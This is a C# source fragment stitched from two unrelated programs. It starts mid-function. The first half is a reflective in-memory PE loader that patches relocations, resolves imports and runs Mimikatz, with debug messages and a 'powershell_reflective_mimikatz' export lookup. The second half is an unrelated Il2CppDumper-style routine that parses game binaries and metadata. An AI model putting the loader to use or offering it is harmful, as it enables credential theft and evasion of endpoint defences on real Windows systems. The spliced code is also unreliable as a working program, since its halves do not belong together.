delta = (int)(currentbase.ToInt32() - (int)pe.OptionalHeader32.ImageBase);
}
else
{
delta = (long)(currentbase.ToInt64() - (long)pe.OptionalHeader64.ImageBase);
}
#if DEBUG
Console.WriteLine("Delta = {0}", delta.ToString("X4"));
#endif
//Modify Memory Based On Relocation Table
IntPtr relocationTable;
if (pe.Is32BitHeader)
{
relocationTable = (IntPtrAdd(codebase, (int)pe.OptionalHeader32.BaseRelocationTable.VirtualAddress));
}
else
{
relocationTable = (IntPtrAdd(codebase, (int)pe.OptionalHeader64.BaseRelocationTable.VirtualAddress));
}
NativeDeclarations.IMAGE_BASE_RELOCATION relocationEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION();
relocationEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(relocationTable, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
int imageSizeOfBaseRelocation = Marshal.SizeOf(typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
IntPtr nextEntry = relocationTable;
int sizeofNextBlock = (int)relocationEntry.SizeOfBlock;
IntPtr offset = relocationTable;
while (true)
{
NativeDeclarations.IMAGE_BASE_RELOCATION relocationNextEntry = new NativeDeclarations.IMAGE_BASE_RELOCATION();
IntPtr x = IntPtrAdd(relocationTable, sizeofNextBlock);
relocationNextEntry = (NativeDeclarations.IMAGE_BASE_RELOCATION)Marshal.PtrToStructure(x, typeof(NativeDeclarations.IMAGE_BASE_RELOCATION));
IntPtr dest = IntPtrAdd(codebase, (int)relocationEntry.VirtualAdress);
for (int i = 0; i < (int)((relocationEntry.SizeOfBlock - imageSizeOfBaseRelocation) / 2); i++)
{
IntPtr patchAddr;
UInt16 value = (UInt16)Marshal.ReadInt16(offset, 8 + (2 * i));
UInt16 type = (UInt16)(value >> 12);
UInt16 fixup = (UInt16)(value & 0xfff);
switch (type)
{
case 0x0:
break;
case 0x3:
patchAddr = IntPtrAdd(dest, fixup);
//Add Delta To Location.
int originalx86Addr = Marshal.ReadInt32(patchAddr);
Marshal.WriteInt32(patchAddr, originalx86Addr + (int)delta);
break;
case 0xA:
patchAddr = IntPtrAdd(dest, fixup);
//Add Delta To Location.
long originalAddr = Marshal.ReadInt64(patchAddr);
Marshal.WriteInt64(patchAddr, originalAddr + delta);
break;
}
}
offset = IntPtrAdd(relocationTable, sizeofNextBlock);
sizeofNextBlock += (int)relocationNextEntry.SizeOfBlock;
relocationEntry = relocationNextEntry;
nextEntry = IntPtrAdd(nextEntry, sizeofNextBlock);
if (relocationNextEntry.SizeOfBlock == 0)
{
break;
}
}
//Resolve Imports
IntPtr z;
IntPtr oa1;
int oa2;
if (pe.Is32BitHeader)
{
z = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress);
oa1 = IntPtrAdd(codebase, (int)pe.OptionalHeader32.ImportTable.VirtualAddress);
oa2 = Marshal.ReadInt32(IntPtrAdd(oa1, 16));
}
else
{
z = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress);
oa1 = IntPtrAdd(codebase, (int)pe.OptionalHeader64.ImportTable.VirtualAddress);
oa2 = Marshal.ReadInt32(IntPtrAdd(oa1, 16));
}
//Get And Display Each DLL To Load
IntPtr threadStart;
uint imageSize;
if (pe.Is32BitHeader)
{
int j = 0;
while (true) //HardCoded Number of DLL's Do this Dynamically.
{
IntPtr a1 = IntPtrAdd(codebase, (20 * j) + (int)pe.OptionalHeader32.ImportTable.VirtualAddress);
int entryLength = Marshal.ReadInt32(IntPtrAdd(a1, 16));
IntPtr a2 = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2));
IntPtr dllNamePTR = (IntPtr)(IntPtrAdd(codebase, Marshal.ReadInt32(IntPtrAdd(a1, 12))));
string DllName = Marshal.PtrToStringAnsi(dllNamePTR);
if (DllName == "")
{
break;
}
IntPtr handle;
try
{
handle = NativeDeclarations.LoadLibrary(DllName);
}
catch (Exception)
{
continue;
}
#if DEBUG
Console.WriteLine("Loaded {0}", DllName);
#endif
int k = 0;
while (true)
{
IntPtr dllFuncNamePTR = (IntPtrAdd(codebase, Marshal.ReadInt32(a2)));
string DllFuncName = Marshal.PtrToStringAnsi(IntPtrAdd(dllFuncNamePTR, 2));
IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName);
Marshal.WriteInt32(a2, (int)funcAddy);
a2 = IntPtrAdd(a2, 4);
if (DllFuncName == "")
{
break;
}
k++;
}
j++;
}
//Transfer Control To OEP
imageSize = pe.OptionalHeader32.SizeOfImage;
#if DEBUG
Console.WriteLine("Executing Mimikatz");
#endif
//Call dllmain
threadStart = IntPtrAdd(codebase, (int)pe.OptionalHeader32.AddressOfEntryPoint);
main dllmain = (main)Marshal.GetDelegateForFunctionPointer(threadStart, typeof(main));
dllmain(codebase, 1, IntPtr.Zero);
#if DEBUG
Console.WriteLine("Thread Complete");
#endif
}
else
{
int j = 0;
while (true)
{
IntPtr a1 = IntPtrAdd(codebase, (20 * j) + (int)pe.OptionalHeader64.ImportTable.VirtualAddress);
int entryLength = Marshal.ReadInt32(IntPtrAdd(a1, 16));
IntPtr a2 = IntPtrAdd(codebase, (int)pe.ImageSectionHeaders[1].VirtualAddress + (entryLength - oa2)); //Need just last part?
IntPtr dllNamePTR = (IntPtr)(IntPtrAdd(codebase, Marshal.ReadInt32(IntPtrAdd(a1, 12))));
string DllName = Marshal.PtrToStringAnsi(dllNamePTR);
if (DllName == "")
{
break;
}
IntPtr handle;
try
{
handle = NativeDeclarations.LoadLibrary(DllName);
}
catch (Exception)
{
continue;
}
#if DEBUG
Console.WriteLine("Loaded {0}", DllName);
#endif
int k = 0;
while (true)
{
IntPtr dllFuncNamePTR = (IntPtrAdd(codebase, Marshal.ReadInt32(a2)));
string DllFuncName = Marshal.PtrToStringAnsi(IntPtrAdd(dllFuncNamePTR, 2));
//Console.WriteLine("Function {0}", DllFuncName);
IntPtr funcAddy = NativeDeclarations.GetProcAddress(handle, DllFuncName);
Marshal.WriteInt64(a2, (long)funcAddy);
a2 = IntPtrAdd(a2, 8);
if (DllFuncName == "")
{
break;
}
k++;
}
j++;
}
//Transfer Control To OEP
imageSize = pe.OptionalHeader64.SizeOfImage;
#if DEBUG
Console.WriteLine("Executing Mimikatz");
#endif
//Call dllmain
threadStart = IntPtrAdd(codebase, (int)pe.OptionalHeader64.AddressOfEntryPoint);
main dllmain = (main)Marshal.GetDelegateForFunctionPointer(threadStart, typeof(main));
dllmain(codebase, 1, IntPtr.Zero);
#if DEBUG
Console.WriteLine("Thread Complete");
#endif
}
IntPtr powerKatzFuncPtr = GetFuncExport(pe, "powershell_reflective_mimikatz");
if (powerKatzFuncPtr == IntPtr.Zero)
{
return(powerKatzFuncPtr);
}
else
{
return(powerKatzFuncPtr);
}
}
private bool Init(string il2CppPath, string metadataPath, out Metadata metadata, out Il2Cpp il2Cpp)
{
WriteOutput("Read config...", Color.Black);
if (File.Exists(realPath + "config.json"))
{
_config = JsonConvert.DeserializeObject <Config>(File.ReadAllText(Application.StartupPath + Path.DirectorySeparatorChar + "config.json"));
}
else
{
_config = new Config();
WriteOutput("config.json file does not exist. Using defaults", Color.Yellow);
}
WriteOutput("Initializing metadata...");
var metadataBytes = File.ReadAllBytes(metadataPath);
metadata = new Metadata(new MemoryStream(metadataBytes));
WriteOutput($"Metadata Version: {metadata.Version}");
WriteOutput("Initializing il2cpp file...");
var il2CppBytes = File.ReadAllBytes(il2CppPath);
var il2CppMagic = BitConverter.ToUInt32(il2CppBytes, 0);
var il2CppMemory = new MemoryStream(il2CppBytes);
switch (il2CppMagic)
{
default:
WriteOutput("ERROR: il2cpp file not supported.");
throw new NotSupportedException("ERROR: il2cpp file not supported.");
case 0x6D736100:
var web = new WebAssembly(il2CppMemory);
il2Cpp = web.CreateMemory();
break;
case 0x304F534E:
var nso = new NSO(il2CppMemory);
il2Cpp = nso.UnCompress();
break;
case 0x905A4D: //PE
il2Cpp = new PE(il2CppMemory);
break;
case 0x464c457f: //ELF
if (il2CppBytes[4] == 2) //ELF64
{
var addressValue = "";
il2Cpp =
InputBox.Show("Input il2cpp dump address or leave empty to force continue:", "", ref addressValue) !=
DialogResult.OK
? string.IsNullOrWhiteSpace(addressValue) ? new Elf64(il2CppMemory) :
new Elf64(il2CppMemory, addressValue)
: new Elf64(il2CppMemory);
}
else
{
var addressValue = "";
il2Cpp =
InputBox.Show("Input il2cpp dump address or leave empty to force continue:", "", ref addressValue) !=
DialogResult.OK
? string.IsNullOrWhiteSpace(addressValue) ? new Elf(il2CppMemory) :
new Elf(il2CppMemory, addressValue)
: new Elf(il2CppMemory);
}
break;
case 0xCAFEBABE: //FAT Mach-O
case 0xBEBAFECA:
var machofat = new MachoFat(new MemoryStream(il2CppBytes));
WriteOutput("Select Platform: ");
for (var i = 0; i < machofat.fats.Length; i++)
{
var fat = machofat.fats[i];
WriteOutput(fat.magic == 0xFEEDFACF ? $"{i + 1}.64bit " : $"{i + 1}.32bit ");
}
WriteOutput("");
var key = Console.ReadKey(true);
var index = int.Parse(key.KeyChar.ToString()) - 1;
var magic = machofat.fats[index % 2].magic;
il2CppBytes = machofat.GetMacho(index % 2);
il2CppMemory = new MemoryStream(il2CppBytes);
if (magic == 0xFEEDFACF)
{
goto case 0xFEEDFACF;
}
else
{
goto case 0xFEEDFACE;
}
case 0xFEEDFACF: // 64bit Mach-O
il2Cpp = new Macho64(il2CppMemory);
break;
case 0xFEEDFACE: // 32bit Mach-O
il2Cpp = new Macho(il2CppMemory);
break;
}
var version = _config.ForceIl2CppVersion ? _config.ForceVersion : metadata.Version;
il2Cpp.SetProperties(version, metadata.maxMetadataUsages);
WriteOutput($"Il2Cpp Version: {il2Cpp.Version}");
if (il2Cpp.Version >= 27 && il2Cpp is ElfBase elf && elf.IsDumped)
{
var metadataValue = "";
if (InputBox.Show("Input global-metadata.dat dump address:", "", ref metadataValue) != DialogResult.OK)
{
return(false);
}
metadata.Address = Convert.ToUInt64(metadataValue, 16);
WriteOutput($"global-metadata.dat dump address: {metadataValue}");
}
WriteOutput("Searching...");
try
{
var flag = il2Cpp.PlusSearch(metadata.methodDefs.Count(x => x.methodIndex >= 0), metadata.typeDefs.Length, metadata.imageDefs.Length);
if (RuntimeInformation.IsOSPlatform(OSPlatform.Windows) && !flag && il2Cpp is PE)
{
WriteOutput("Use custom PE loader");
il2Cpp = PELoader.Load(il2CppPath);
il2Cpp.SetProperties(version, metadata.maxMetadataUsages);
flag = il2Cpp.PlusSearch(metadata.methodDefs.Count(x => x.methodIndex >= 0), metadata.typeDefs.Length, metadata.imageDefs.Length);
}
if (!flag)
{
flag = il2Cpp.Search();
}
if (!flag)
{
flag = il2Cpp.SymbolSearch();
}
if (!flag)
{
WriteOutput("ERROR: Can't use auto mode to process file, try manual mode.");
WriteOutput("Input CodeRegistration: ");
var codeValue = "";
if (InputBox.Show(@"Input CodeRegistration: ", "", ref codeValue) != DialogResult.OK)
{
return(false);
}
var codeRegistration = Convert.ToUInt64(codeValue, 16);
WriteOutput($"CodeRegistration: {codeValue}");
var metadataValue = "";
if (InputBox.Show("Input MetadataRegistration: ", "", ref metadataValue) != DialogResult.OK)
{
return(false);
}
var metadataRegistration = Convert.ToUInt64(metadataValue, 16);
WriteOutput($"MetadataRegistration: {metadataValue}");
il2Cpp.Init(codeRegistration, metadataRegistration);
return(true);
}
}
catch (Exception e)
{
WriteOutput(e.Message);
WriteOutput("ERROR: An error occurred while processing.");
return(false);
}
return(true);
}
